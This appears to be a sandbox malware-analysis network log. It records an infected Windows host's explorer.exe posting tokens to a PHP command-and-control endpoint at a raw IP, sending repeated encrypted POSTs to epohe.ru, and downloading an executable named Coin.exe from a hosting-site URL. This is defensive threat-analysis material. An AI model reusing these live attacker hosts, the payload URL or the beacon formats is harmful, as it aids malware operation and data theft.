Sep 1, 2024 18:28:28.086023092 CEST	202	IN	HTTP/1.1 200 OK Date: Sun, 01 Sep 2024 16:28:27 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=79 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 1, 2024 18:28:28.528206110 CEST	473	OUT	POST /e96ea2db21fa9a1b.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FHCGCFHDHIIIDGCAAEGD Host: 91.202.233.158 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 46 48 43 47 43 46 48 44 48 49 49 49 44 47 43 41 41 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 64 35 39 61 62 31 62 63 65 35 66 66 64 37 66 33 36 35 65 35 63 37 32 65 37 30 65 63 34 65 63 37 34 37 30 62 66 35 66 61 63 61 61 65 64 34 61 33 35 39 37 63 37 31 39 38 63 37 35 32 30 61 63 37 62 66 62 34 64 34 34 0d 0a 2d 2d 2d 2d 2d 2d 46 48 43 47 43 46 48 44 48 49 49 49 44 47 43 41 41 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 46 48 43 47 43 46 48 44 48 49 49 49 44 47 43 41 41 45 47 44 2d 2d 0d 0a Data Ascii: ------FHCGCFHDHIIIDGCAAEGDContent-Disposition: form-data; name="token"2d59ab1bce5ffd7f365e5c72e70ec4ec7470bf5facaaed4a3597c7198c7520ac7bfb4d44------FHCGCFHDHIIIDGCAAEGDContent-Disposition: form-data; name="message"ybncbhylepme------FHCGCFHDHIIIDGCAAEGD--
Sep 1, 2024 18:28:28.773201942 CEST	202	IN	HTTP/1.1 200 OK Date: Sun, 01 Sep 2024 16:28:28 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=78 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 1, 2024 18:28:29.417886972 CEST	473	OUT	POST /e96ea2db21fa9a1b.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KJDGDGDHDGDBFIDHDBAF Host: 91.202.233.158 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 4a 44 47 44 47 44 48 44 47 44 42 46 49 44 48 44 42 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 64 35 39 61 62 31 62 63 65 35 66 66 64 37 66 33 36 35 65 35 63 37 32 65 37 30 65 63 34 65 63 37 34 37 30 62 66 35 66 61 63 61 61 65 64 34 61 33 35 39 37 63 37 31 39 38 63 37 35 32 30 61 63 37 62 66 62 34 64 34 34 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 47 44 47 44 48 44 47 44 42 46 49 44 48 44 42 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 47 44 47 44 48 44 47 44 42 46 49 44 48 44 42 41 46 2d 2d 0d 0a Data Ascii: ------KJDGDGDHDGDBFIDHDBAFContent-Disposition: form-data; name="token"2d59ab1bce5ffd7f365e5c72e70ec4ec7470bf5facaaed4a3597c7198c7520ac7bfb4d44------KJDGDGDHDGDBFIDHDBAFContent-Disposition: form-data; name="message"wkkjqaiaxkhb------KJDGDGDHDGDBFIDHDBAF--
Sep 1, 2024 18:28:29.655884027 CEST	202	IN	HTTP/1.1 200 OK Date: Sun, 01 Sep 2024 16:28:29 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=77 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	56178	191.191.224.16	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 18:29:17.870544910 CEST	270	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ynijbmhqiplny.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 255 Host: epohe.ru
Sep 1, 2024 18:29:17.870564938 CEST	255	OUT	Data Raw: 3b 6e 21 16 f7 bb 1d 53 d6 a3 c8 70 0e 70 7f cc 7c 0b ba e2 6f 05 90 63 0c 7a 73 97 48 cb b2 6d 9f 29 c1 2f 06 6d 24 11 ed 9e 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 78 56 f3 be Data Ascii: ;n!Spp\|oczsHm)/m$? 9Yt M@NA .[k,vuxV;E^uJ8z`Ueu&Y1* f\[LTjHN!d3a/g(\T!V;wFFYoh./
Sep 1, 2024 18:29:19.119992018 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 01 Sep 2024 16:29:18 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	56179	191.191.224.16	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 18:29:24.847635031 CEST	269	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://unrxkwkfeyhj.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 160 Host: epohe.ru
Sep 1, 2024 18:29:24.847660065 CEST	160	OUT	Data Raw: 3b 6e 21 16 f7 bb 1d 53 d6 a3 c8 70 0e 70 7f cc 7c 0b ba e2 6f 05 90 63 0c 7a 73 97 48 cb b2 6d 9f 29 c1 2f 06 6d 24 11 ed 9e 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 23 21 cc 99 Data Ascii: ;n!Spp\|oczsHm)/m$? 9Yt M@NA .[k,vu#!Q2S2tr`-e*(GqP?$@H;^E
Sep 1, 2024 18:29:26.361638069 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 01 Sep 2024 16:29:26 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	56181	191.191.224.16	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 18:29:32.403373957 CEST	268	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://vqiayymywrc.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 153 Host: epohe.ru
Sep 1, 2024 18:29:32.403383970 CEST	153	OUT	Data Raw: 3b 6e 21 16 f7 bb 1d 53 d6 a3 c8 70 0e 70 7f cc 7c 0b ba e2 6f 05 90 63 0c 7a 73 97 48 cb b2 6d 9f 29 c1 2f 06 6d 24 11 ed 9e 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 42 21 bc b5 Data Ascii: ;n!Spp\|oczsHm)/m$? 9Yt M@NA .[k,vuB!]WYxg[J[9u` ]iJ^C2\bV%\|E{-8
Sep 1, 2024 18:29:33.678709030 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 01 Sep 2024 16:29:33 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	56182	191.191.224.16	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 18:29:39.543625116 CEST	270	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://itpinyokimroq.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 113 Host: epohe.ru
Sep 1, 2024 18:29:39.543652058 CEST	113	OUT	Data Raw: 3b 6e 21 16 f7 bb 1d 53 d6 a3 c8 70 0e 70 7f cc 7c 0b ba e2 6f 05 90 63 0c 7a 73 97 48 cb b2 6d 9f 29 c1 2f 06 6d 24 11 ed 9e 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 2b 4b e8 f0 Data Ascii: ;n!Spp\|oczsHm)/m$? 9Yt M@NA .[k,vu+KMlZ?F=Qd(
Sep 1, 2024 18:29:40.838824034 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 01 Sep 2024 16:29:40 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	56183	191.191.224.16	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 18:29:46.017560005 CEST	270	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ojmxnklvhubca.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 355 Host: epohe.ru
Sep 1, 2024 18:29:46.017574072 CEST	355	OUT	Data Raw: 3b 6e 21 16 f7 bb 1d 53 d6 a3 c8 70 0e 70 7f cc 7c 0b ba e2 6f 05 90 63 0c 7a 73 97 48 cb b2 6d 9f 29 c1 2f 06 6d 24 11 ed 9e 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 5f 01 cb fe Data Ascii: ;n!Spp\|oczsHm)/m$? 9Yt M@NA .[k,vu_dkWZs4I1\|;/Jn}e(Q{'+CH_H<&CN[,IV@:!%73P}XuoYoG
Sep 1, 2024 18:29:47.285330057 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 01 Sep 2024 16:29:47 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	56184	92.36.226.66	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 18:29:56.700198889 CEST	269	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://kxswswyeekbt.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 205 Host: epohe.ru
Sep 1, 2024 18:29:56.700222015 CEST	205	OUT	Data Raw: 3b 6e 21 16 f7 bb 1d 53 d6 a3 c8 70 0e 70 7f cc 7c 0b ba e2 6f 05 90 63 0c 7a 73 97 48 cb b2 6d 9f 29 c1 2f 06 6d 24 11 ed 9e 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 49 4b a3 f2 Data Ascii: ;n!Spp\|oczsHm)/m$? 9Yt M@NA .[k,vuIKc~ttygE[`\x+N[V!.@b1,<c%bL-[(~I
Sep 1, 2024 18:29:57.565114021 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 01 Sep 2024 16:29:57 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	56185	92.36.226.66	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 18:30:04.367039919 CEST	270	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ypumfgujjpamw.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 307 Host: epohe.ru
Sep 1, 2024 18:30:04.367050886 CEST	307	OUT	Data Raw: 3b 6e 21 16 f7 bb 1d 53 d6 a3 c8 70 0e 70 7f cc 7c 0b ba e2 6f 05 90 63 0c 7a 73 97 48 cb b2 6d 9f 29 c1 2f 06 6d 24 11 ed 9e 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 3e 22 bf bb Data Ascii: ;n!Spp\|oczsHm)/m$? 9Yt M@NA .[k,vu>"Kcjc\|IDF @Ky2D#.K][@uPp/f"x#%,sd9&O+rfFgT4YWfZKB(
Sep 1, 2024 18:30:05.184688091 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 01 Sep 2024 16:30:05 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	56186	92.36.226.66	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 18:30:11.043839931 CEST	268	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://tpbwkwmjyyc.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 346 Host: epohe.ru
Sep 1, 2024 18:30:11.043890953 CEST	346	OUT	Data Raw: 3b 6e 21 16 f7 bb 1d 53 d6 a3 c8 70 0e 70 7f cc 7c 0b ba e2 6f 05 90 63 0c 7a 73 97 48 cb b2 6d 9f 29 c1 2f 06 6d 24 11 ed 9e 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 4c 28 d1 85 Data Ascii: ;n!Spp\|oczsHm)/m$? 9Yt M@NA .[k,vuL(.Gt3Ope[a_?Z:^%Gf6+vU2#')`?<,b:>lg_(EU0UAE_#`ib75
Sep 1, 2024 18:30:11.872128963 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 01 Sep 2024 16:30:11 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	56187	92.36.226.66	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 18:30:17.371278048 CEST	268	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://uggrlskcswn.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 286 Host: epohe.ru
Sep 1, 2024 18:30:17.371304989 CEST	286	OUT	Data Raw: 3b 6e 21 16 f7 bb 1d 53 d6 a3 c8 70 0e 70 7f cc 7c 0b ba e2 6f 05 90 63 0c 7a 73 97 48 cb b2 6d 9f 29 c1 2f 06 6d 24 11 ed 9e 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 40 41 ce 86 Data Ascii: ;n!Spp\|oczsHm)/m$? 9Yt M@NA .[k,vu@A_?}d3,P*>i>AYOJ;G %JS1(tLe:2d4sT%FB(0OXI+rm~B
Sep 1, 2024 18:30:18.221718073 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 01 Sep 2024 16:30:18 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	56188	92.36.226.66	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 18:30:23.951495886 CEST	272	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ksuubhamvjulqde.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 247 Host: epohe.ru
Sep 1, 2024 18:30:23.951543093 CEST	247	OUT	Data Raw: 3b 6e 21 16 f7 bb 1d 53 d6 a3 c8 70 0e 70 7f cc 7c 0b ba e2 6f 05 90 63 0c 7a 73 97 48 cb b2 6d 9f 29 c1 2f 06 6d 24 11 ed 9e 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 26 4f c8 ac Data Ascii: ;n!Spp\|oczsHm)/m$? 9Yt M@NA .[k,vu&O^]k]b<Y^"}:~7w7gQA/#Et[ 9ZWi&$m[.)!B$8Z%}WTS[{s&2)
Sep 1, 2024 18:30:25.040429115 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 01 Sep 2024 16:30:24 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	56189	92.36.226.66	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 18:30:29.735198975 CEST	272	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://dauyrhmxccbsrgk.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 121 Host: epohe.ru
Sep 1, 2024 18:30:29.735235929 CEST	121	OUT	Data Raw: 3b 6e 21 16 f7 bb 1d 53 d6 a3 c8 70 0e 70 7f cc 7c 0b ba e2 6f 05 90 63 0c 7a 73 97 48 cb b2 6d 9f 29 c1 2f 06 6d 24 11 ed 9e 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 3b 30 df a5 Data Ascii: ;n!Spp\|oczsHm)/m$? 9Yt M@NA .[k,vu;0{&Cqs8ue?(X_}
Sep 1, 2024 18:30:30.577759981 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 01 Sep 2024 16:30:30 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	56190	92.36.226.66	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 18:30:35.553705931 CEST	269	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://dgvopxagbvtq.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 231 Host: epohe.ru
Sep 1, 2024 18:30:35.553705931 CEST	231	OUT	Data Raw: 3b 6e 21 16 f7 bb 1d 53 d6 a3 c8 70 0e 70 7f cc 7c 0b ba e2 6f 05 90 63 0c 7a 73 97 48 cb b2 6d 9f 29 c1 2f 06 6d 24 11 ed 9e 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 67 5b de 8a Data Ascii: ;n!Spp\|oczsHm)/m$? 9Yt M@NA .[k,vug[~lbRY*41xoH)P_<A8$$Vr3Z`+/+K?16cW6$JalwC^JTe
Sep 1, 2024 18:30:36.395734072 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 01 Sep 2024 16:30:36 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.4	56191	92.36.226.66	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 18:30:42.638418913 CEST	269	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://dkyucoyaekdk.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 145 Host: epohe.ru
Sep 1, 2024 18:30:42.638474941 CEST	145	OUT	Data Raw: 3b 6e 21 16 f7 bb 1d 53 d6 a3 c8 70 0e 70 7f cc 7c 0b ba e2 6f 05 90 63 0c 7a 73 97 48 cb b2 6d 9f 29 c1 2f 06 6d 24 11 ed 9e 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 38 18 c5 ff Data Ascii: ;n!Spp\|oczsHm)/m$? 9Yt M@NA .[k,vu8G]hEjtbO(sXH>hq/.3SkI?#
Sep 1, 2024 18:30:43.498720884 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 01 Sep 2024 16:30:43 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.4	56192	92.36.226.66	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 18:30:48.024061918 CEST	270	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://aipiphxycclwh.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 158 Host: epohe.ru
Sep 1, 2024 18:30:48.024102926 CEST	158	OUT	Data Raw: 3b 6e 21 16 f7 bb 1d 53 d6 a3 c8 70 0e 70 7f cc 7c 0b ba e2 6f 05 90 63 0c 7a 73 97 48 cb b2 6d 9f 29 c1 2f 06 6d 24 11 ed 9e 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 77 49 d0 a9 Data Ascii: ;n!Spp\|oczsHm)/m$? 9Yt M@NA .[k,vuwI~UTQ~i %9*GdA,tC!=]~6TKKu:
Sep 1, 2024 18:30:48.861845970 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 01 Sep 2024 16:30:48 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.4	56193	92.36.226.66	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 18:30:54.468869925 CEST	273	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://nbvjehgoajlapmsg.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 206 Host: epohe.ru
Sep 1, 2024 18:30:54.468895912 CEST	206	OUT	Data Raw: 3b 6e 21 16 f7 bb 1d 53 d6 a3 c8 70 0e 70 7f cc 7c 0b ba e2 6f 05 90 63 0c 7a 73 97 48 cb b2 6d 9f 29 c1 2f 06 6d 24 11 ed 9e 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 3d 5b c9 98 Data Ascii: ;n!Spp\|oczsHm)/m$? 9Yt M@NA .[k,vu=[EUv<LCe9gcm".:>\|{Js%R%uQ1AY)3kg6Ai
Sep 1, 2024 18:30:55.292237997 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 01 Sep 2024 16:30:55 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	56171	84.32.84.144	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 16:27:58 UTC	192	OUT	GET /Coin.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: www.darkviolet-alpaca-923878.hostingersite.com
2024-09-01 16:27:58 UTC	533	IN	HTTP/1.1 200 OK Server: hcdn Date: Sun, 01 Sep 2024 16:27:58 GMT Content-Type: application/x-executable Content-Length: 3639176 Connection: close last-modified: Sun, 01 Sep 2024 09:33:03 GMT etag: "378788-66d434cf-b3fea62b77a48d21;;;" platform: hostinger panel: hpanel content-security-policy: upgrade-insecure-requests x-turbo-charged-by: LiteSpeed alt-svc: h3=":443"; ma=86400 x-hcdn-request-id: 53845e03e6820db7780935df49e77812-bos-edge3 x-hcdn-cache-status: MISS x-hcdn-upstream-rt: 0.007 Accept-Ranges: bytes
2024-09-01 16:27:58 UTC	836	IN	Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZP@!L!This program must be run under Win32$7
2024-09-01 16:27:58 UTC	1369	IN	Data Raw: 00 d0 37 00 00 00 00 00 00 66 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 40 00 03 07 42 6f 6f 6c 65 61 6e 01 00 00 00 00 01 00 00 00 00 10 40 00 05 46 61 6c 73 65 04 54 72 75 65 8d 40 00 2c 10 40 00 02 04 43 68 61 72 01 00 00 00 00 ff 00 00 00 90 40 10 40 00 01 07 49 Data Ascii: 7f7@P@Boolean@FalseTrue@,@Char@@I
